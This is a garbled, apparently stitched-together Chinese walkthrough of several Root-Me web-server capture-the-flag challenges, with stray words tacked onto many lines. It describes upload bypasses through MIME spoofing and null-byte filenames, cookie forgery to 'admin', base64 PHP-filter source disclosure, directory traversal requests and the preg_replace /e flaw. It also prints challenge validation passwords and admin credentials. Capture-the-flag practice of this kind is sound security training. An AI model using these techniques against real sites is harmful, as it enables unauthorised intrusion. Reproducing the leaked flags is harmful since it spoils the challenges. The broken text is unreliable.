Gallery v0.02php
介紹html
Your goal is to hack this photo galery by uploading PHP code.web
/challenge/web-serveur/ch20/tmp/phpSfAkKz 訪問無果安全
返回cookie
查看源碼session
view-source:http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/ccbde566dbc436aa41b84533bbc60ad8//3.php.jpg?previewapp
刪除ide
http://challenge01.root-me.org/web-serveur/ch20/galerie/upload/ccbde566dbc436aa41b84533bbc60ad8//3.php.jpg函數
PV1OejHY4MxfsC2mHpRz9post
常見的MIME類型 超文本標記語言文本 .html text/html xml文檔 .xml text/xml XHTML文檔 .xhtml application/xhtml+xml 普通文本 .txt text/plain RTF文本 .rtf application/rtf PDF文檔 .pdf application/pdf Microsoft Word文件 .word application/msword PNG圖像 .png image/png GIF圖形 .gif image/gif JPEG圖形 .jpeg,.jpg image/jpeg au聲音文件 .au audio/basic MIDI音樂文件 mid,.midi audio/midi,audio/x-midi RealAudio音樂文件 .ra, .ram audio/x-pn-realaudio MPEG文件 .mpg,.mpeg video/mpeg AVI文件 .avi video/x-msvideo GZIP文件 .gz application/x-gzip TAR文件 .tar application/x-tar 任意的二進制數據 application/octet-stream
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: image/gif
查看源碼
抓包
刪除
http://challenge01.root-me.org/web-serveur/ch21/galerie/upload/cb13dd644fb605082b0a59f2d15c84e7//2.php
password : UN2YusYPnmwfHFHI5zj3
Bob create a script to gather user’s email...
PS : Bob really love cookies
ctrl+u
<!--SetCookie("ch7","visiteur");
輸入test
點擊Saved email adresses
You need to be admin
用live http heads 抓取數據包
Host: challenge01.root-me.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challenge01.root-me.org/web-serveur/ch7/
Cookie: ch7=visiteur
X-Forwarded-For: 8.8.8.8
修改Cookie: ch7=visiteur
Cookie: ch7=admin
replay
刷新
Validation password : ml-SYMPA
Photo gallery v 0.01
Find the hidden section of the photo galery.
刪除ch15.php
burp爬目錄
發現有ch15/galerie/86hwnX2r/password.txt
點擊便可
http://challenge01.root-me.org/web-serveur/ch15/galerie/86hwnX2r/password.txt
kcb$!Bx@v4Gs9Ez
%00-零零截斷
Gallery v0.04
Your goal is to hack this photo galery by uploading PHP code.
上傳2.php
再上傳3.php.jpeg
3.php%00.jpg
這樣的話,系統就會把.jpeg後面的給捨去。直接解析3.php了
返回
點擊剛纔上傳的圖片
Well done ! You can validate this challenge with the password : YPNchi2NmTwygr2dgCCF
Retrieved the administrator password of this application.
PHP 過濾器用於對來自非安全來源的數據(好比用戶輸入)進行驗證和過濾。
PD9waHAKaW5jbHVkZSgiY29uZmlnLnBocCIpOwoKaWYgKCBpc3NldCgkX1BPU1RbInVzZXJuYW1lIl0pICYmIGlzc2V0KCRfUE9TVFsicGFzc3dvcmQiXSkgKXsKICAgIGlmICgkX1BPU1RbInVzZXJuYW1lIl09PSR1c2VybmFtZSAmJiAkX1BPU1RbInBhc3N3b3JkIl09PSRwYXNzd29yZCl7CiAgICAgIHByaW50KCI8aDI+V2VsY29tZSBiYWNrICE8L2gyPiIpOwogICAgICBwcmludCgiVG8gdmFsaWRhdGUgdGhlIGNoYWxsZW5nZSB1c2UgdGhpcyBwYXNzd29yZDxici8+PGJyLz4iKTsKICAgIH0gZWxzZSB7CiAgICAgIHByaW50KCI8aDM+RXJyb3IgOiBubyBzdWNoIHVzZXIvcGFzc3dvcmQ8L2gyPjxiciAvPiIpOwogICAgfQp9IGVsc2Ugewo/PgoKPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+CiAgTG9naW4mbmJzcDs8YnIvPgogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ1c2VybmFtZSIgLz48YnIvPjxici8+CiAgUGFzc3dvcmQmbmJzcDs8YnIvPgogIDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIC8+PGJyLz48YnIvPgogIDxici8+PGJyLz4KICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iY29ubmVjdCIgLz48YnIvPjxici8+CjwvZm9ybT4KCjw/cGhwIH0gPz4=
解碼
<?php
include("config.php");
if ( isset($_POST["username"]) && isset($_POST["password"]) ){
if ($_POST["username"]==$username && $_POST["password"]==$password){
print("
<?php } ?>
include("config.php");
PD9waHAKCiR1c2VybmFtZT0iYWRtaW4iOwokcGFzc3dvcmQ9IkRBUHQ5RDJta3kwQVBBRiI7Cgo/Pg==
<?php
$username="admin";
$password="DAPt9D2mky0APAF";
?>
It seems that the developper often leaves backup files around...
http://challenge01.root-me.org/web-serveur/ch17/index.php?_SESSION[logged]=1
well done, you can validate with the password : NoiQYdpcd5kgNwG
PHP文件包含漏洞的產生緣由是在經過PHP的函數引入文件時,因爲傳入的文件名沒有通過合理的校驗,從而操做了預想以外的文件,就可能致使意外的文件泄露甚至惡意的代碼注入
Abbreviated LFI
Get in the admin section.
查看標籤中的子標籤的連接
http://challenge01.root-me.org/web-serveur/ch16/?files=reseau&f=index.html
http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm&f=index.html
http://challenge01.root-me.org/web-serveur/ch16/?files=esprit&f=index.html
發現變量files是標籤的一個變量和f下屬標籤的變量
因此
目錄遍歷
http://challenge01.root-me.org/web-serveur/ch16/?files=../&f=index.html
在index.php裏面
if (isset($_GET["files"])) $files=$_GET["files"];
if (isset($_GET["f"]) && $_GET["f"]!="")
http://challenge01.root-me.org/web-serveur/ch16/?files=../&f=admin/index.php
users = array('admin' => 'OpbNJ60xYpvAQU8');
PHP loose comparison
Get an access.
Authentication source code
$FLAG, $USER and $PASSWORD_SHA256 in secret file
e modifier
Read flag.php
Warning: preg_replace(): Delimiter must not be alphanumeric or backslash in /challenge/web-serveur/ch37/index.php on line 25
/e 修 正符使 preg_replace() 將 replacement 參數看成 PHP 代碼(在適當的逆向引用替換完以後)。提示:要確保 replacement 構成一個合法的 PHP 代碼字符串,不然 PHP 會在報告在包含 preg_replace() 的行中出現語法解析錯 誤
歡迎訪問個人獨立博客:joy_nick